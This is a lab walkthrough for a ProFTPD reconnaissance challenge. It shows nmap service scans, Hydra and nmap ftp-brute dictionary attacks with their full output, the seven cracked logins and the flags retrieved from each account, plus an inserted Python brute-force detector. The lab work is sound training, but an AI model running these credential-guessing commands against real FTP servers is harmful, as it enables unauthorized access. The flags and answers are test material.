FTP
| ip a
inet 192.213.157.2/24
|
| nmap 192.213.157.3
PORT STATE SERVICE
21/tcp open ftp
|
| nmap 192.213.157.3 -p 21 -sV -O
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
Aggressive OS guesses: Linux 2.6.32 (96%)
|
| ftp 192.213.157.3
ftp> bye
|
| hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.213.157.3 ftp
|
| ftp 192.213.157.3
Name (192.213.157.3:root): sysadmin
331 Password required for sysadmin
Password: 654321
230 User sysadmin logged in
ftp> ls
ftp> help
ftp> get secret.txt
ftp> bye
|
| echo "sysadmin" > users
cat users
|
| nmap 192.213.157.3 --script ftp-brute --script-args userdb=/root/users -p 21
|
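ProFTP Recon: Basics
Overview
In this challenge we will look at the basics of ProFTP server reconnaissance. Please start the lab and answer the following questions:
Questions
- What is the version of FTP server?
- Use the username dictionary /usr/share/metasploit-framework/data/wordlists/common_users.txt and password dictionary /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt to check if any of these credentials work on the system. List all found credentials.
- Find the password of user "sysadmin" using nmap script.
- Find seven flags hidden on the server.
Instructions:
- This lab is dedicated to you! No other users are on this network :)
- Once you start the lab, you will have access to a root terminal of a Kali instance
- Your Kali has an interface with IP address 192.X.Y.Z. Run "ip addr" to know the values of X and Y.
- The target machine should be located at the IP address 192.X.Y.3.
- Do not attack the gateway located at IP address 192.X.Y.1
My own approach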
| root@attackdefense:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: ip_vti0@NONE: <NOARP> mtu 1480 qdisc noop state DOWN group default qlen 1000
link/ipip 0.0.0.0 brd 0.0.0.0
27281: eth0@if27282: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:0a:01:00:0e brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 10.1.0.14/16 brd 10.1.255.255 scope global eth0
valid_lft forever preferred_lft forever
27284: eth1@if27285: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:c0:d5:c0:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 192.213.192.2/24 brd 192.213.192.255 scope global eth1
valid_lft forever preferred_lft forever
|
| root@attackdefense:~# nmap 192.213.192.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-21 02:42 UTC
Nmap scan report for target-1 (192.213.192.3)
Host is up (0.0000090s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
21/tcp open ftp
MAC Address: 02:42:C0:D5:C0:03 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds
|
Questions
What is the version of FTP server?
ProFTPD 1.3.5a
| root@attackdefense:~# nmap 192.213.192.3 -p 21 -sV -O
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-21 02:43 UTC
Nmap scan report for target-1 (192.213.192.3)
Host is up (0.000035s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
MAC Address: 02:42:C0:D5:C0:03 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (96%), Linux 2.6.32 - 3.10 (96%), Linux 2.6.32 (96%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.4 - 3.10 (94%), Synology DiskStation Manager 5.2-5644 (94%), Linux 2.6.32 - 2.6.35 (94%), Linux 2.6.32 - 3.5 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Unix
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.11 seconds
|
| root@attackdefense:~# ftp 192.213.192.3
Connected to 192.213.192.3.
220 ProFTPD 1.3.5a Server (AttackDefense-FTP) [::ffff:192.213.192.3]
Name (192.213.192.3:root):
331 Password required for root
Password:
530 Login incorrect.
Login failed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
530 Please login with USER and PASS
ftp: bind: Address already in use
ftp> bye
221 Goodbye.
|
Use the username dictionary /usr/share/metasploit-framework/data/wordlists/common_users.txt and password dictionary /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt to check if any of these credentials work on the system. List all found credentials.
| sysadmin 654321
rooty qwerty
demo butterfly
auditor chocolate
anon purple
administrator tweety
diag tigger
|
| root@attackdefense:~# hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.213.192.3 ftp
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-08-21 02:51:44
[DATA] max 16 tasks per 1 server, overall 16 tasks, 7063 login tries (l:7/p:1009), ~442 tries per task
[DATA] attacking ftp://192.213.192.3:21/
[21][ftp] host: 192.213.192.3 login: sysadmin password: 654321
[21][ftp] host: 192.213.192.3 login: rooty password: qwerty
[21][ftp] host: 192.213.192.3 login: demo password: butterfly
[21][ftp] host: 192.213.192.3 login: auditor password: chocolate
[21][ftp] host: 192.213.192.3 login: anon password: purple
[21][ftp] host: 192.213.192.3 login: administrator password: tweety
[21][ftp] host: 192.213.192.3 login: diag password: tigger
1 of 1 target successfully completed, 7 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-08-21 02:52:30
|
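An added example, not part of the original walkthrough or the lab: the Hydra run above scheduled 7063 login tries and finished in 46 seconds, which the server sees as a burst of 530 replies from one client with 230 replies mixed in. The code below flags that pattern; the event tuples, client addresses and thresholds are constructed assumptions, and turning server logs or captures into (time, client, user, reply code) tuples is left to the log source.

```python
from collections import defaultdict, deque

LOGIN_FAILED, LOGIN_OK = 530, 230  # FTP reply codes seen in the sessions on this page


def detect_bruteforce(events, window=60.0, max_failures=5):
    """events: time-ordered (timestamp_s, client_ip, user, reply_code) tuples.

    Returns {client_ip: stats} for each client with more than max_failures
    530 replies inside `window` seconds. Every account that client logged in
    to (230) is listed under "compromised", including logins that happened
    before the threshold was crossed.
    """
    recent = defaultdict(deque)  # client -> timestamps of its recent 530s
    stats = defaultdict(lambda: {"failures": 0, "users_tried": set(), "compromised": []})
    flagged = {}
    for ts, client, user, code in events:
        s = stats[client]
        if code == LOGIN_FAILED:
            s["failures"] += 1
            s["users_tried"].add(user)
            q = recent[client]
            q.append(ts)
            while q and ts - q[0] > window:  # drop failures older than the window
                q.popleft()
            if len(q) > max_failures:
                flagged[client] = s          # same dict, so later updates show up
        elif code == LOGIN_OK:
            s["compromised"].append(user)
    return flagged


def sample_events():
    """Constructed data: one client guessing fast, one user with a single typo."""
    users = ["sysadmin", "rooty", "demo"]
    ev = [(i * 0.25, "192.0.2.10", users[i % 3], LOGIN_FAILED) for i in range(40)]
    ev.append((10.0, "192.0.2.10", "sysadmin", LOGIN_OK))
    ev += [(3.0, "192.0.2.50", "auditor", LOGIN_FAILED),
           (9.0, "192.0.2.50", "auditor", LOGIN_OK)]
    return sorted(ev, key=lambda e: e[0])


if __name__ == "__main__":
    for client, s in detect_bruteforce(sample_events()).items():
        print(client, s["failures"], sorted(s["users_tried"]), s["compromised"])
```

Accounts listed under "compromised" need a password reset, and a flagged client is a candidate for rate limiting or blocking at the FTP server or firewall.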
| root@attackdefense:~# ftp 192.213.192.3
Connected to 192.213.192.3.
220 ProFTPD 1.3.5a Server (AttackDefense-FTP) [::ffff:192.213.192.3]
Name (192.213.192.3:root): sysadmin
331 Password required for sysadmin
Password:
230 User sysadmin logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 0 0 33 Nov 20 2018 secret.txt
226 Transfer complete
ftp> get secret.txt
local: secret.txt remote: secret.txt
200 PORT command successful
150 Opening BINARY mode data connection for secret.txt (33 bytes)
226 Transfer complete
33 bytes received in 0.00 secs (402.8320 kB/s)
ftp> bye
221 Goodbye.
root@attackdefense:~# cat secret.txt
260ca9dd8a4577fc00b7bd5810298076
|
| root@attackdefense:~# ftp 192.213.192.3
Connected to 192.213.192.3.
220 ProFTPD 1.3.5a Server (AttackDefense-FTP) [::ffff:192.213.192.3]
Name (192.213.192.3:root): auditor
331 Password required for auditor
Password:
230 User auditor logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 0 0 33 Nov 20 2018 secret.txt
226 Transfer complete
ftp> get secret.txt
local: secret.txt remote: secret.txt
200 PORT command successful
150 Opening BINARY mode data connection for secret.txt (33 bytes)
226 Transfer complete
33 bytes received in 0.00 secs (217.7470 kB/s)
ftp> bye
221 Goodbye.
root@attackdefense:~# cat secret.txt
098f6bcd4621d373cade4e832627b4f6
|
Find the password of user “sysadmin” using nmap script.
ftp-brute
| root@attackdefense:~# echo "sysadmin" > user.lst
root@attackdefense:~# cat user.lst
sysadmin
root@attackdefense:~# nmap --script ftp-brute --script-args userdb=/root/user.lst -p 21 192.213.192.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-21 03:11 UTC
Nmap scan report for target-1 (192.213.192.3)
Host is up (0.000060s latency).
PORT STATE SERVICE
21/tcp open ftp
| ftp-brute:
| Accounts:
| sysadmin:654321 - Valid credentials
|_ Statistics: Performed 24 guesses in 6 seconds, average tps: 4.0
MAC Address: 02:42:C0:D5:C0:03 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 6.56 seconds
|
Find seven flags hidden on the server.
user | flag
sysadmin | 260ca9dd8a4577fc00b7bd5810298076
auditor | 098f6bcd4621d373cade4e832627b4f6
rooty | e529a9cea4a728eb9c5828b13b22844c
demo | d6a6bc0db10694a2d90e3a69648f3a03
anon | 1bc29b36f623ba82aaf6724fd3b16718
administrator | 21232f297a57a5a743894a0e4a801fc3
diag | 12a032ce9179c32a6c7ab397b9d871fa
| root@attackdefense:~# ftp 192.213.192.3
Connected to 192.213.192.3.
220 ProFTPD 1.3.5a Server (AttackDefense-FTP) [::ffff:192.213.192.3]
Name (192.213.192.3:root): rooty
331 Password required for rooty
Password:
230 User rooty logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 0 0 33 Nov 20 2018 secret.txt
226 Transfer complete
ftp> get secret.txt
local: secret.txt remote: secret.txt
200 PORT command successful
150 Opening BINARY mode data connection for secret.txt (33 bytes)
226 Transfer complete
33 bytes received in 0.00 secs (67.4196 kB/s)
ftp> bye
221 Goodbye.
root@attackdefense:~# cat secret.txt
e529a9cea4a728eb9c5828b13b22844c
|
| root@attackdefense:~# ftp 192.213.192.3
Connected to 192.213.192.3.
220 ProFTPD 1.3.5a Server (AttackDefense-FTP) [::ffff:192.213.192.3]
Name (192.213.192.3:root): demo
331 Password required for demo
Password:
230 User demo logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 0 0 33 Nov 20 2018 secret.txt
226 Transfer complete
ftp> get secret.txt
local: secret.txt remote: secret.txt
200 PORT command successful
150 Opening BINARY mode data connection for secret.txt (33 bytes)
226 Transfer complete
33 bytes received in 0.00 secs (64.9729 kB/s)
ftp> bye
221 Goodbye.
root@attackdefense:~# cat secret.txt
d6a6bc0db10694a2d90e3a69648f3a03
|
| root@attackdefense:~# ftp 192.213.192.3
Connected to 192.213.192.3.
220 ProFTPD 1.3.5a Server (AttackDefense-FTP) [::ffff:192.213.192.3]
Name (192.213.192.3:root): anon
331 Password required for anon
Password:
230 User anon logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 0 0 33 Nov 20 2018 secret.txt
226 Transfer complete
ftp> get secret.txt
local: secret.txt remote: secret.txt
200 PORT command successful
150 Opening BINARY mode data connection for secret.txt (33 bytes)
226 Transfer complete
33 bytes received in 0.00 secs (68.7134 kB/s)
ftp> bye
221 Goodbye.
root@attackdefense:~# cat secret.txt
1bc29b36f623ba82aaf6724fd3b16718
|
| root@attackdefense:~# ftp 192.213.192.3
Connected to 192.213.192.3.
220 ProFTPD 1.3.5a Server (AttackDefense-FTP) [::ffff:192.213.192.3]
Name (192.213.192.3:root): administrator
331 Password required for administrator
Password:
230 User administrator logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 0 0 33 Nov 20 2018 secret.txt
226 Transfer complete
ftp> get secret.txt
local: secret.txt remote: secret.txt
200 PORT command successful
150 Opening BINARY mode data connection for secret.txt (33 bytes)
226 Transfer complete
33 bytes received in 0.00 secs (78.0304 kB/s)
ftp> bye
221 Goodbye.
root@attackdefense:~# cat secret.txt
21232f297a57a5a743894a0e4a801fc3
|
| root@attackdefense:~# ftp 192.213.192.3
Connected to 192.213.192.3.
220 ProFTPD 1.3.5a Server (AttackDefense-FTP) [::ffff:192.213.192.3]
Name (192.213.192.3:root): diag
331 Password required for diag
Password:
230 User diag logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 0 0 33 Nov 20 2018 secret.txt
226 Transfer complete
ftp> get secret.txt
local: secret.txt remote: secret.txt
200 PORT command successful
150 Opening BINARY mode data connection for secret.txt (33 bytes)
226 Transfer complete
33 bytes received in 0.00 secs (56.9374 kB/s)
ftp> bye
221 Goodbye.
root@attackdefense:~# cat secret.txt
12a032ce9179c32a6c7ab397b9d871fa
|
Solution
The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-518.pdf
References:
ProFTPD
hydra
ftp
Script ftp-brute